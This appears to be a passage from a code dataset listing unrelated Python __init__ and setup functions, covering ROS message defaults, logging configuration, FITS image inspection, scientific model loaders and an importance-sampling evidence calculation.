self.ekf_pitch = 0.\n if self.ekf_yaw is None:\n self.ekf_yaw = 0.\n if self.ekf_lat is None:\n self.ekf_lat = 0.\n if self.ekf_lon is None:\n self.ekf_lon = 0.\n if self.ekf_alt is None:\n self.ekf_alt = 0.\n if self.ekf_vN is None:\n self.ekf_vN = 0.\n if self.ekf_vE is None:\n self.ekf_vE = 0.\n if self.ekf_vD is None:\n self.ekf_vD = 0.\n if self.ekf_vX is None:\n self.ekf_vX = 0.\n if self.ekf_vY is None:\n self.ekf_vY = 0.\n if self.ekf_vZ is None:\n self.ekf_vZ = 0.\n if self.rad_gyro_X is None:\n self.rad_gyro_X = 0.\n if self.rad_gyro_Y is None:\n self.rad_gyro_Y = 0.\n if self.rad_gyro_Z is None:\n self.rad_gyro_Z = 0.\n if self.angular_acc_X is None:\n self.angular_acc_X = 0.\n if self.angular_acc_Y is None:\n self.angular_acc_Y = 0.\n if self.angular_acc_Z is None:\n self.angular_acc_Z = 0.\n if self.alt_DVL is None:\n self.alt_DVL = 0\n if self.dvl_error_code is None:\n self.dvl_error_code = b''\n if self.flag_to_check is None:\n self.flag_to_check = 0\n if self.imu_deg_gyro_X is None:\n self.imu_deg_gyro_X = 0.\n if self.imu_deg_gyro_Y is None:\n self.imu_deg_gyro_Y = 0.\n if self.imu_deg_gyro_Z is None:\n self.imu_deg_gyro_Z = 0.\n if self.imu_mag_X is None:\n self.imu_mag_X = 0.\n if self.imu_mag_Y is None:\n self.imu_mag_Y = 0.\n if self.imu_mag_Z is None:\n self.imu_mag_Z = 0.\n if self.imu_acc_X is None:\n self.imu_acc_X = 0.\n if self.imu_acc_Y is None:\n self.imu_acc_Y = 0.\n if self.imu_acc_Z is None:\n self.imu_acc_Z = 0.\n if self.gps_lat is None:\n self.gps_lat = 0\n if self.gps_lon is None:\n self.gps_lon = 0\n if self.gps_alt is None:\n self.gps_alt = 0.\n if self.gps_vN is None:\n self.gps_vN = 0.\n if self.gps_vE is None:\n self.gps_vE = 0.\n if self.gps_vD is None:\n self.gps_vD = 0.\n if self.dvl_vX is None:\n self.dvl_vX = 0.\n if self.dvl_vY is None:\n self.dvl_vY = 0.\n if self.dvl_vZ is None:\n self.dvl_vZ = 0.\n else:\n self.header = std_msgs.msg.Header()\n self.sample_count = 0\n self.ekf_roll = 0.\n self.ekf_pitch = 0.\n self.ekf_yaw = 0.\n self.ekf_lat = 0.\n self.ekf_lon = 0.\n self.ekf_alt = 0.\n self.ekf_vN = 0.\n self.ekf_vE = 0.\n self.ekf_vD = 0.\n self.ekf_vX = 0.\n self.ekf_vY = 0.\n self.ekf_vZ = 0.\n self.rad_gyro_X = 0.\n self.rad_gyro_Y = 0.\n self.rad_gyro_Z = 0.\n self.angular_acc_X = 0.\n self.angular_acc_Y = 0.\n self.angular_acc_Z = 0.\n self.alt_DVL = 0\n self.dvl_error_code = b''\n self.flag_to_check = 0\n self.imu_deg_gyro_X = 0.\n self.imu_deg_gyro_Y = 0.\n self.imu_deg_gyro_Z = 0.\n self.imu_mag_X = 0.\n self.imu_mag_Y = 0.\n self.imu_mag_Z = 0.\n self.imu_acc_X = 0.\n self.imu_acc_Y = 0.\n self.imu_acc_Z = 0.\n self.gps_lat = 0\n self.gps_lon = 0\n self.gps_alt = 0.\n self.gps_vN = 0.\n self.gps_vE = 0.\n self.gps_vD = 0.\n self.dvl_vX = 0.\n self.dvl_vY = 0.\n self.dvl_vZ = 0.", "def __init__(self, images=[], logfile='inspect_raw.info', load_log=True, \n master=None):\n if len(images) == 0:\n print('No images specified')\n return False\n \n if not os.path.exists(images[0]):\n print('First image not found (%s), is path correct?' %(images[0]))\n return False\n \n ##### Add .fits to filename and make backup if necessary\n self.logfile = logfile\n if not self.logfile.lower().endswith('.fits'):\n self.logfile += '.fits'\n \n if os.path.exists(self.logfile):\n bk = glob.glob(self.logfile+'.backup*')\n if len(bk) > 0:\n bkup_file = self.logfile + '.backup.%03d' %(len(bk))\n else:\n bkup_file = self.logfile + '.backup'\n \n shutil.copy(self.logfile, bkup_file)\n print('Made copy of %s -> %s' %(self.logfile, bkup_file))\n \n ####### Initialize parameters\n self.params = {} \n self.images = images\n \n self.marked_reads = None\n self.NREAD = 14\n \n ### Polygons for reads\n x0 = y0 = 12\n px = py = 6\n dx = dy = 241\n xi = np.array([0,1,1,0])\n yi = np.array([0,0,1,1])\n \n c = 0\n self.read_polygons = []\n for j in range(4):\n for i in range(4):\n c += 1\n if c > self.NREAD:\n break\n else:\n polyx = x0+i*(px+dx)+xi*dx\n polyy = y0+j*(py+dy)+yi*dy\n poly = np.array([polyx, polyy]).T\n self.read_polygons.append(mplPath.Path(poly))\n \n if os.path.exists(self.logfile) & load_log:\n self.read_fits()\n \n self.N = len(self.images)\n\n for key in ['satellite', 'earth', 'other', 'kill', 'seen']:\n if key not in self.params.keys():\n self.params[key] = np.zeros(self.N, dtype=np.int)\n \n if self.marked_reads is None:\n self.marked_reads = np.zeros((self.N, self.NREAD), dtype=int)\n \n if 'comment' not in self.params.keys():\n self.params['comment'] = ['---' for i in range(self.N)]\n \n self.i = 0\n self.master = master\n self.setup_gui()", "def __init__(self, config, logger):\n self.config = config\n self.logger = logger", "def _configure_logger(self):\n\n # NOTE not thread safe. Multiple BaseScripts cannot be instantiated concurrently.\n level = getattr(logging, self.args.log_level.upper())\n\n if self._GLOBAL_LOG_CONFIGURED:\n return\n\n # TODO different processors for different basescripts ?\n # TODO dynamically inject processors ?\n\n # since the hooks need to run through structlog, need to wrap them like processors\n def wrap_hook(fn):\n @wraps(fn)\n def processor(logger, method_name, event_dict):\n fn(event_dict)\n return event_dict\n\n return processor\n\n processors = self.define_log_processors()\n processors.extend(\n [ wrap_hook(h) for h in self.define_log_pre_format_hooks() ]\n )\n\n log_renderer = self.define_log_renderer()\n stderr_required = (not self.args.quiet)\n pretty_to_stderr = (\n stderr_required\n and (\n self.args.log_format == \"pretty\"\n or (self.args.log_format is None and sys.stderr.isatty())\n )\n )\n\n should_inject_pretty_renderer = (\n pretty_to_stderr\n and not isinstance(log_renderer, structlog.dev.ConsoleRenderer)\n )\n if should_inject_pretty_renderer:\n stderr_required = False\n processors.append(StderrConsoleRenderer())\n\n processors.append(log_renderer)\n processors.extend(\n [ wrap_hook(h) for h in self.define_log_post_format_hooks() ]\n )\n\n streams = []\n # we need to use a stream if we are writing to both file and stderr, and both are json\n if stderr_required:\n streams.append(sys.stderr)\n\n if self.args.log_file is not None:\n # TODO handle creating a directory for this log file ?\n # TODO set mode and encoding appropriately\n streams.append(open(self.args.log_file, 'a'))\n\n assert len(streams) != 0, \"cannot configure logger for 0 streams\"\n\n stream = streams[0] if len(streams) == 1 else Stream(*streams)\n atexit.register(stream.close)\n\n # a global level struct log config unless otherwise specified.\n structlog.configure(\n processors=processors,\n context_class=dict,\n logger_factory=LevelLoggerFactory(stream, level=level),\n wrapper_class=BoundLevelLogger,\n cache_logger_on_first_use=True,\n )\n\n # TODO take care of removing other handlers\n stdlib_root_log = logging.getLogger()\n stdlib_root_log.addHandler(StdlibStructlogHandler())\n stdlib_root_log.setLevel(level)\n\n self._GLOBAL_LOG_CONFIGURED = True", "def __init__(self, config):\n\n self.locations_hltv_starting_ = config[sC.BUCKET_LOCATIONS][sC.HLTV_STARTING]\n self.score_starting_ = config[sC.BUCKET_LOCATIONS][sC.SCORE_STARTING]\n self.logs_starting_ = config[sC.BUCKET_LOCATIONS][sC.LOGS_STARTING]\n self.temp = config[sC.FOLDER_LOCATIONS][sC.TEMP_APP_ENGINE_FOLDER]\n self.results_ = config[sC.FOLDER_LOCATIONS][sC.CONFIGS_RESULTS]\n self.amxmodx_logs_ = config[sC.FOLDER_LOCATIONS][sC.ADDONS_AMXMODX_LOGS]\n self.cstrike_logs_ = config[sC.FOLDER_LOCATIONS][sC.CSTRIKE_LOGS]\n self.hltv_demos_func_url = config[sC.CLOUD_FUNCTIONS_URLS][sC.HLTV_DEMOS_FUNC]\n self.ftp_logs_func_url = config[sC.CLOUD_FUNCTIONS_URLS][sC.FTP_LOGS_FUNC]\n\n print('{} - Initialized'.format(__name__))", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GraspConfig, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n else:\n self.position = geometry_msgs.msg.Point()\n self.approach = geometry_msgs.msg.Vector3()\n self.binormal = geometry_msgs.msg.Vector3()\n self.axis = geometry_msgs.msg.Vector3()\n self.width = std_msgs.msg.Float32()\n self.score = std_msgs.msg.Float32()\n self.sample = geometry_msgs.msg.Point()", "def __init__(self, config):\n logging.info(\"Creating footprint\")\n # self.infra = yaml.load(config)\n self.infra = config\n self.footprint_name = self.infra.get(\"footprint\", \"ehw\")\n self.images = self.infra.get(\"images\")\n self.old_images = self.infra.get(\"old_images\", [])\n self.container_name = \"%s-metadata\" % self.footprint_name\n \n self.admin_password = self.infra.get('admin-password')\n self.savefile = self.infra.get(\"footprint\", \"outfile\") + \"-save.yaml\"\n if os.path.exists(self.savefile):\n self.saved_images = yaml.load(open(self.savefile))\n self.footprint_status=self.infra.get(\"footprint_status\", None)\n logging.debug(\"Loaded saved images: %s\" % self.saved_images)\n # sys.exit(0) ", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(LineTrackerGoalTimed, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.x is None:\n self.x = 0.\n if self.y is None:\n self.y = 0.\n if self.z is None:\n self.z = 0.\n if self.yaw is None:\n self.yaw = 0.\n if self.v_des is None:\n self.v_des = 0.\n if self.a_des is None:\n self.a_des = 0.\n if self.t_start is None:\n self.t_start = genpy.Time()\n if self.duration is None:\n self.duration = genpy.Duration()\n if self.relative is None:\n self.relative = False\n else:\n self.x = 0.\n self.y = 0.\n self.z = 0.\n self.yaw = 0.\n self.v_des = 0.\n self.a_des = 0.\n self.t_start = genpy.Time()\n self.duration = genpy.Duration()\n self.relative = False", "def __init__ (self, config, logger):\n self.logger = logger\n self.logger.add('loading AREA')\n config['data_type'] = np.float32\n self.area = AreaGrid(config,logger = self.logger)\n self.area.config['dataset_name'] = 'Area Data'\n self.area.config['description'] = \\\n \"\"\"Area Data contains fractional cohort data for each year the ATM\n was run. \n \"\"\"\n self.logger.add('performing post AREA setup')\n self.shape = self.area.config['grid_shape']\n self.aoi = self.area.area_of_interest()\n config['shape'] = self.shape\n config['grid_shape'] = self.area.config['grid_shape']\n config['AOI mask'] = self.aoi\n config['cohort list'] = self.area.get_cohort_list()\n self.logger.add('loading ALD')\n self.ald = ALDGrid(config,logger = self.logger)\n self.ald.config['dataset_name'] = 'ALD Data'\n self.ald.config['description'] = \\\n \"\"\"ALD Data contains ALD, and Protective Layer data for each year \n the ATM was run.\n \"\"\"\n self.logger.add('loading POI')\n self.poi = POIGrid(config,logger = self.logger)\n self.poi.config['dataset_name'] = 'POI Data'\n self.poi.config['description'] = \\\n \"\"\"POI Data contains Poi data for each year the ATM was run. \n \"\"\"\n self.logger.add('loading ICE')\n self.ice = IceGrid(config,logger = self.logger)\n self.ice.config['dataset_name'] = 'Ice Data'\n self.ice.config['description'] = \\\n \"\"\"\n Ice Data contains the ice content grid for the ATM model run\n \"\"\"\n self.logger.add('loading LAKE POND')\n self.lake_pond = LakePondGrid(config,logger = self.logger)\n self.lake_pond.config['dataset_name'] = 'Lake Pond Data'\n self.lake_pond.config['description'] = \\\n \"\"\"Lake-Pond Data contains Lake and Pond depth and count data for \n each year the ATM was run. \n \"\"\"\n self.logger.add('loading CLIMATE EVENT')\n self.climate_event = ClimateEventGrid(config,logger = self.logger)\n self.climate_event.config['dataset_name'] = 'Climate Event Data'\n self.climate_event.config['description'] = \\\n \"\"\"Climate Event Data contains climate event data for each \n year the ATM was run. \n \"\"\"\n ## TODO:redo masks here\n # for lpt in config['pond types'] + config['lake types']:\n # #~ print lpt\n # mask = self.area[lpt][0] > 0 # all cells in first ts > 0\n # self.lake_pond.apply_mask(lpt, mask)\n self.logger.add('loading DRAINGAGE')\n self.drainage = DrainageGrid(config,logger = self.logger)\n self.drainage.config['dataset_name'] = 'Drainage Data'\n self.drainage.config['description'] = \"\"\"\n Drainage contains the drainage grid for the ATM model run\n \"\"\"\n \n self.logger.add('loading DEGREE DAY')\n self.degreedays = DegreeDayGrids(\n os.path.join(\n config['Input_dir'], config['Met_Control']['FDD_file']),\n os.path.join(\n config['Input_dir'], config['Met_Control']['TDD_file'])\n )\n \n ## what does this do?\n self.ald.setup_ald_constants(\n self.degreedays.thawing[config['start year']]\n )", "def __init__(self, config):\n\n # controls for scope logging\n self.vars = None\n self.log = {}\n self.conf = config\n pe.set_default_val(self.conf, 'clip_by_norm', 0.3)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(tipCoords, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.thumb is None:\n self.thumb = [0.] * 3\n if self.index is None:\n self.index = [0.] * 3\n if self.middle is None:\n self.middle = [0.] * 3\n if self.ring is None:\n self.ring = [0.] * 3\n if self.little is None:\n self.little = [0.] * 3\n else:\n self.thumb = [0.] * 3\n self.index = [0.] * 3\n self.middle = [0.] * 3\n self.ring = [0.] * 3\n self.little = [0.] * 3", "def __init__(self, config_file):\n # Parse configuration file\n self.config_file = config_file\n self.config = ConfigParser.SafeConfigParser()\n self.config.read(self.config_file)\n\n self.source_do_purge = self.config.getboolean(\"source\", \"do_purge\")\n self.source_requests_dir = self.config.get(\"source\", \"requests_dir\")\n\n self.add_console_handler = self.config.getboolean(\"source\", \"add_console_handler\")\n self.add_file_handler = self.config.getboolean(\"source\", \"add_file_handler\")\n self.log_file_name = self.config.get(\"source\", \"log_file_name\")\n log_level = self.config.get(\"source\", \"log_level\")\n if log_level == 'DEBUG':\n self.log_level = logging.DEBUG\n elif log_level == 'INFO':\n self.log_level = logging.INFO\n elif log_level == 'WARNING':\n self.log_level = logging.WARNING\n elif log_level == 'ERROR':\n self.log_level = logging.ERROR\n elif log_level == 'CRITICAL':\n self.log_level = logging.CRITICAL\n\n self.author_config_file = self.config.get(\"author\", \"config_file\")\n self.author_do_purge = self.config.getboolean(\"author\", \"do_purge\")\n self.author_requests_dir = self.config.get(\"author\", \"requests_dir\")\n\n self.flickr_content_dir = self.config.get(\"flickr\", \"content_dir\")\n self.tumblr_content_dir = self.config.get(\"tumblr\", \"content_dir\")\n self.twitter_content_dir = self.config.get(\"twitter\", \"content_dir\")\n\n self.tumblr_min_total_tags = self.config.getint(\"tumblr\", \"min_total_tags\")\n self.tumblr_min_total_blogs = self.config.getint(\"tumblr\", \"min_total_blogs\")\n\n # Create a logger\n root = logging.getLogger()\n root.setLevel(self.log_level)\n formatter = logging.Formatter(\n \"%(asctime)s %(name)s %(levelname)s: %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n for handler in root.handlers:\n root.removeHandler(handler)\n if self.add_console_handler:\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n root.addHandler(console_handler)\n if self.add_file_handler:\n file_handler = logging.handlers.RotatingFileHandler(\n self.log_file_name, maxBytes=1000000, backupCount=5, encoding='utf-8')\n file_handler.setFormatter(formatter)\n root.addHandler(file_handler)\n\n self.logger = logging.getLogger(u\"BluPenSource\")", "def __init__(self, config_directory, scale_override=None):\n self._config_directory = config_directory\n\n self._config_detector = DetectorConfig(config_directory)\n self._config_align = AlignConfig(config_directory, scale_override=scale_override)\n self._config_crystal = CrystalMatchConfig(config_directory)", "def __init__(self):\r\n config = ConfigProvider().getProcessingConfig()\r\n self.xGround = config.get(\"xGround\")\r\n self.yGround = config.get(\"yGround\")", "def __init__(self, config, fname, dt, preload=True): \n \n self.config = config\n self.fname = fname\n self.dt = dt\n self.xvar = config.get('profiles', 'xvar')\n self.yvar = config.get('profiles', 'yvar')\n self.zvar = config.get('profiles', 'zvar')\n self.zbounds = np.array(self.config.get('grid', 'zbounds').split(','), dtype=np.float64)\n self.pvar = config.get('profiles', 'pvar')\n self.pnvar = config.get('profiles', 'pnvar')\n self.irvar = config.get('profiles', 'irvar')\n self.psvar = config.get('profiles', 'psvar')\n self.psalqcvar = config.get('profiles', 'psalqcvar')\n self.qcvar = config.get('profiles', 'qcvar')\n self.posqcvar = config.get('profiles', 'posqcvar')\n self.datavar = config.get('profiles', 'datavar')\n self.fixedgap = config.get('profiles', 'fixedgap')\n \n if preload: \n self.load_data()\n self.load_x()\n self.load_y()\n self.load_z()\n self.load_p()\n self.load_pn()\n self.load_ir()\n self.load_ps()\n self.load_psalqc()\n self.load_qc()\n self.load_posqc()", "def __init__(\n self, path=\"logger.yml\", default_level=logging.INFO, env_key=\"LOG_CFG\"\n ):\n\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(os.path.normpath(path)):\n with open(path, \"rt\") as f:\n config = yaml.safe_load(f.read())\n to_log = \"\"\n # If directory is non existent create it\n # Todo: Here a dir will be made after installation, so if this prohibited go to the other dir\n if \"file\" in config[\"handlers\"]:\n pathtologfile = os.path.normpath(config[\"handlers\"][\"file\"][\"filename\"]).split(os.sep)\n if not os.path.isdir(\n os.path.join(os.getcwd(), *pathtologfile[:-1])\n ):\n os.mkdir(os.path.join(os.getcwd(), *pathtologfile[:-1]))\n else:\n to_log = (\n \"Logging to file failed, since no file handler was defined!\"\n )\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n\n self.log_LEVELS = {\n \"NOTSET\": 0,\n \"DEBUG\": 10,\n \"INFO\": 20,\n \"WARNING\": 30,\n \"ERROR\": 40,\n \"CRITICAL\": 50,\n }\n\n self.welcome_string = (\n \"\\n\"\n \" __ ______ ______ ______ __ __ ______ \\n\" \n \" /\\ \\ /\\ __ \\ /\\ ___\\ /\\ ___\\ /\\ \\ /\\ \\ /\\ ___\\ \\n\" \n \" \\ \\ \\____ \\ \\ \\/\\ \\ \\ \\ \\__ \\ \\ \\ __\\ \\ \\ \\ \\ \\ \\____ \\ \\ __\\ \\n\" \n \" \\ \\_____\\ \\ \\_____\\ \\ \\_____\\ \\ \\_\\ \\ \\_\\ \\ \\_____\\ \\ \\_____\\ \\n\" \n \" \\/_____/ \\/_____/ \\/_____/ \\/_/ \\/_/ \\/_____/ \\/_____/\\n\\n\\n\"\n )\n\n snoopy = (\"\\n\\n\\n XXXX\\n\"\n \" X XX\\n\"\n \" X *** X XXXXX\\n\"\n \" X ***** X XXX XX\\n\"\n \" XXXX ******* XXX XXXX XX\\n\"\n \" XX X ****** XXXXXXXXX XX XXX\\n\"\n \" XX X **** X X** X\\n\"\n\" X XX XX X X***X\\n\"\n\" X //XXXX X XXXX\\n\"\n\" X // X XX\\n\"\n\"X // X XXXXXXXXXXXXXXXXXX/ \\n\"\n\"X XXX// X X\\n\"\n\"X X X X X\\n\"\n\"X X X X X\\n\"\n\" X X X X X XX\\n\"\n\" X X X X X XXX XX\\n\"\n\" X XXX X X X X X X\\n\"\n\" X X X XX X XXXX\\n\"\n\" X X XXXXXXXX/ XX XX X\\n\"\n\" XX XX X X X XX\\n\"\n\" XX XXXX XXXXXX/ X XXXX\\n\"\n\" XXX XX*** X X\\n\"\n\" XXXXXXXXXXXXX * * X X\\n\"\n\" *---* X X X\\n\"\n\" *-* * XXX X X\\n\"\n\" *- * XXX X\\n\"\n\" *- *X XXX\\n\"\n\" *- *X X XXX\\n\"\n\" *- *X X XX\\n\"\n\" *- *XX X X\\n\"\n\" * *X* X X X\\n\"\n\" * *X * X X X\\n\"\n\" * * X** X XXXX X\\n\"\n\" * * X** XX X X\\n\"\n\" * ** X** X XX X\\n\"\n\" * ** X* XXX X X\\n\"\n\" * ** XX XXXX XXX\\n\"\n\" * * * XXXX X X\\n\"\n\" * * * X X X\\n\"\n\" >>>>>>>******* * * X X XXXXXXXX/ \\n\"\n\" * * * /XXXXX XXXXXXXX/ <\\n\"\n\" >>>>>********** * X < / <\\n\"\n\" >>>>* * X / / <XXXXX\\n\"\n\">>>>>>>>>********** XXXXXXXXXXXXXXXXXXXXXX\\n\")\n\n # Create a logger Object\n self.LOG = logging.getLogger(\"Logfile\")\n # Print welcome message\n self.LOG.info(self.welcome_string)\n self.LOG.debug(snoopy)\n if to_log:\n self.LOG.info(to_log)", "def __init__(self, exp_params, stamp_unique=True):\n self._main_thread = True\n self.params = copy.deepcopy(exp_params)\n self.params['class'] = self.__class__.__name__\n self._check_required_params()\n self.__check_exist_path()\n self.__create_folder(stamp_unique)\n set_experiment_logger(self.params['path_exp'], FILE_LOGS)\n # set stream logging to info level\n for lh in logging.getLogger().handlers:\n if isinstance(lh, logging.StreamHandler) and \\\n not isinstance(lh, logging.FileHandler):\n lh.setLevel(logging.INFO)\n logging.info('initialise experiment...')\n logging.info(string_dict(self.params, 'PARAMETERS:'))\n logging.info('COMPUTER: %r', computer_info())", "def __build__(self,data_index=0):\n \n super(Image,self).__build__()\n # -- How to read the image\n self._build_properties = dict(\n data_index = data_index,\n header_exptime = \"EXPTIME\",\n dataslice0=\"undefined\",\n dataslice1=\"undefined\",\n bkgdbox={\"bh\":100,\"bw\":100,\"fh\":3,\"fw\":3},\n )", "def init(self):\n self.filename, file_extension = os.path.splitext(os.path.basename(__file__))\n\n # parse argument\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--configdir\", help=\"your config.ini directory\", type=str)\n parser.add_argument(\"--logdir\", help=\"your log directory\", type=str)\n args = parser.parse_args()\n\n # determine config directory\n if args.configdir:\n config_file = os.path.join(args.configdir, 'config.ini')\n else:\n config_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), '../config', 'config.ini')\n\n if args.logdir:\n log_file = os.path.join(args.logdir, '%s.log' % self.filename)\n else:\n log_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), '../logs', '%s.log' % self.filename)\n\n # load config\n self.config = configparser.ConfigParser()\n self.config.read(config_file)\n\n # init logger\n logbook.set_datetime_format(\"local\")\n self.logger = logbook.Logger(name=self.filename)\n format_string = '%s %s' % ('[{record.time:%Y-%m-%d %H:%M:%S.%f%z}] {record.level_name}',\n '{record.module}:{record.lineno}: {record.message}')\n if self.config.has_option('handler_stream_handler', 'verbose'):\n log_handler = logbook.StreamHandler(sys.stdout, level=self.config.get('Logger', 'level'), bubble=True,\n format_string=format_string)\n self.logger.handlers.append(log_handler)\n log_handler = logbook.TimedRotatingFileHandler(log_file, level=self.config.get('Logger', 'level'),\n date_format='%Y%m%d', backup_count=5, bubble=True,\n format_string=format_string)\n self.logger.handlers.append(log_handler)\n else:\n log_handler = logbook.TimedRotatingFileHandler(log_file, level=self.config.get('Logger', 'level'),\n date_format='%Y%m%d', backup_count=5, bubble=True,\n format_string=format_string)\n self.logger.handlers.append(log_handler)\n\n # init database\n self.db = AdhocDatabaseHandler.instantiate_from_configparser(self.config, self.logger)", "def __init__(self, args, logger: MainLogger, log_start_t=0):\n\n super().__init__(args, logger)\n self.batch_size = self.args.batch_size_run\n assert self.batch_size == 1\n\n self.env = env_REGISTRY[self.args.env](**self.args.env_args)\n # Find id of the first policy team - Only supported for one policy team in the build plan\n teams = args.env_args[\"match_build_plan\"]\n self.policy_team_id = get_policy_team_id(teams)\n if self.args.headless_controls:\n controls = HeadlessControls(env=self.env)\n controls.daemon = True\n controls.start()\n\n self.episode_limit = self.env.episode_limit\n self.t = 0 # current time step within the episode\n self.log_start_t = log_start_t # timestep to start logging from\n self.t_env = 0 # total time steps for this runner in the provided environment across multiple episodes\n self.phi: FeatureFunction = feature_func_REGISTRY[self.args.sfs] if self.args.sfs else None\n self.home_batch = None\n self.home_mac = None\n self.new_batch_fn = None", "def __init__(self, pyconfig):\n self.pylot_cfg = pyconfig\n self.logfile = pyconfig.dir_logs + 'Pylot.log'", "def __init__(self, samples, obs, nPlanets=0, nOffsets=0, nImportSamps=10000, scale=1.0, pRatio=1., slope=False):\n\n self.samples = samples\n self.nPlanets = nPlanets\n self.nOffsets = nOffsets\n self.nImportSamps = nImportSamps\n self.scale = scale\n self.pRatio = pRatio\n self.slope = slope\n\n param_keys, param_IS_keys = create.dict_keys(self.nPlanets, self.nOffsets, slope=self.slope)\n print(param_keys)\n print(param_IS_keys)\n postSamp, nPostSamples = create.posterior_samples_from_emcee(self.samples, param_keys)\n\n postSamp_pKhkl = compute.pKewM_to_importSamp_parameterization(postSamp, param_IS_keys, self.nPlanets)\n\n self.mediansG, self.covMatrixG, self.choleskyDecomp, self.logDetSigmaG = compute.matrix_info(postSamp_pKhkl)\n\n nParams = len(param_IS_keys)\n random_values = [ truncnorm.rvs(-self.scale, self.scale, size=nParams) for i in range(self.nImportSamps) ]\n\n samples = [ [] for i in range(self.nImportSamps) ]\n g_samples = [ [] for i in range(self.nImportSamps) ]\n loggs = [ 0. for i in range(self.nImportSamps) ]\n\n print(\"## Drawing importance samples...\")\n\n for x in range(self.nImportSamps):\n dispersion = np.dot( self.choleskyDecomp, np.transpose(random_values[x]) )\n samples[x] = self.mediansG + dispersion\n g_samples[x] = list(samples[x])\n\n diff = np.subtract(samples[x],self.mediansG)\n\n logg = -0.5 * (nParams*np.log(2.*np.pi) + self.logDetSigmaG + \\\n np.dot( np.transpose(diff), \\\n np.linalg.solve(self.covMatrixG, np.subtract(samples[x],self.mediansG) ) ) ) - \\\n nParams*np.log(erf(self.scale/np.sqrt(2.)))\n loggs[x] = logg\n\n print(\"## Done drawing importance samples!\")\n print(\"\")\n \n g_samples_T = np.transpose(g_samples)\n importSamp_dict = OrderedDict()\n\n for i, item in enumerate(g_samples_T):\n importSamp_dict[param_IS_keys[i]] = item\n\n importSamp_pKhkl_dict = compute.importSamp_parameterization_to_pKewM(importSamp_dict, param_keys, self.nPlanets, self.pRatio)\n importSamp_pKewM = np.transpose([ vals for key, vals in importSamp_pKhkl_dict.items() ])\n\n print(\"## Evaluating lnpost at importance samples...\")\n\n logPosteriors = np.array([ np.nan for i in range(self.nImportSamps) ])\n for i in range(nImportSamps):\n logPosteriors[i] = lnpost(importSamp_pKewM[i], obs, self.nPlanets, slope=self.slope)\n\n print(\"## Done evaluating lnpost!\")\n print(\"\")\n\n\n logSum = -(9.**99.)\n\n for i in range(self.nImportSamps): \n diff = logPosteriors[i] - loggs[i]\n\n logSum = np.logaddexp(logSum, diff)\n if i%1000==0:\n print(str(i+1) + \" \" + str(logSum - np.log(i+1)))\n \n self.logAvg = logSum - np.log(self.nImportSamps)\n self.f_MCMC = 0.\n\n print(\"\")\n print(\"## logAvg: \" + str(self.logAvg))\n\n postSamp_wo_keys = []\n for key in postSamp_pKhkl:\n postSamp_wo_keys.append(postSamp_pKhkl[key])\n \n postSamp_wo_keys = np.transpose(np.array(postSamp_wo_keys))\n diff = postSamp_wo_keys-self.mediansG\n\n for j in range(nPostSamples):\n\n z = np.linalg.solve(self.choleskyDecomp, diff[j])\n\n if all([abs(k)<=scale for k in z]):\n self.f_MCMC += 1.\n else:\n self.f_MCMC += 0.\n \n self.f_MCMC = self.f_MCMC/nPostSamples\n self.logFML = self.logAvg - np.log(self.f_MCMC)\n\n print(\"## f_MCMC: \" + str(self.f_MCMC))\n print(\"## logFML: \" + str(self.logFML))\n\n print(\"## FML computed!\")\n print(\"## Done!\")", "def __init__(self, start_time, forcing_step_seconds, forcing_num_steps,\n xname, yname, xsize, ysize, input_directory, output_directory,\n work_directory, template_directory, input_file_pattern,\n archive_directory, strict=True):\n self.start_time = start_time\n self.forcing_num_steps = forcing_num_steps\n self.forcing_step_seconds = forcing_step_seconds\n self.xname = xname\n self.yname = yname\n # Grid must have positive sizes in x and y directions.\n if strict and (xsize <= 0 or ysize <= 0):\n msg = 'Grid sizes must be >= 1, got xsize={} and ysize={}.'\n raise ConfigurationError(msg.format(xsize, ysize))\n self.xsize = xsize\n self.ysize = ysize\n # The input and template directories are required to exist, the output\n # and work directories may be able to be created when required.\n if strict and not os.path.exists(input_directory):\n msg = 'The input directory \"{}\" does not exist.'\n raise ConfigurationError(msg.format(input_directory))\n self.input_directory = input_directory\n if strict and not os.path.exists(template_directory):\n msg = 'The template directory \"{}\" does not exist.'\n raise ConfigurationError(msg.format(template_directory))\n self.template_directory = template_directory\n self.work_directory = work_directory\n self.output_directory = output_directory\n self.input_file_pattern = input_file_pattern\n self.archive_directory = archive_directory", "def setup(self, cfg):\n super().setup(cfg)\n\n \"\"\"\n TODO override the date format to ISOsomething standard...\n \"\"\"\n #general_fmt = r\"%(asctime)s [%(process)3d] [%(levelname)-7s] %(message)s\"\n #Gunicorn 'access' somehow has a very different requestion context. So the ip getting is left out, it is inserted by access below\n general_formatter = RequestFormatter(\n '[%(asctime)s] [%(base_hostname)s:%(hostname)s:%(process)3d] [%(levelname)-7s] %(message)s'\n )\n #print(self.cfg.access_log_format)\n #self.cfg.access_log_format = general_fmt\n\n # Override Gunicorn's `error_log` configuration.\n self._set_handler( self.error_log, cfg.errorlog, general_formatter )\n\n #Push the general format at our the access formatter, which will publish specialised messages\n self._set_handler( self.access_log, cfg.accesslog, general_formatter )", "def __init__(self, name, config):\n self.name = name\n self.config = config\n self.logger = logging.getLogger(name)\n if 'type' not in config:\n self.config['type'] = DEFAULT_BACKUP_TYPE\n elif config['type'] not in SUPPORTED_BACKUP_TYPES:\n self.logger.error('Unknown dump type: %s', config['type'])\n sys.exit(-1)\n if 'retention' not in config:\n self.config['retention'] = DEFAULT_RETENTION_DAYS\n else:\n self.config['retention'] 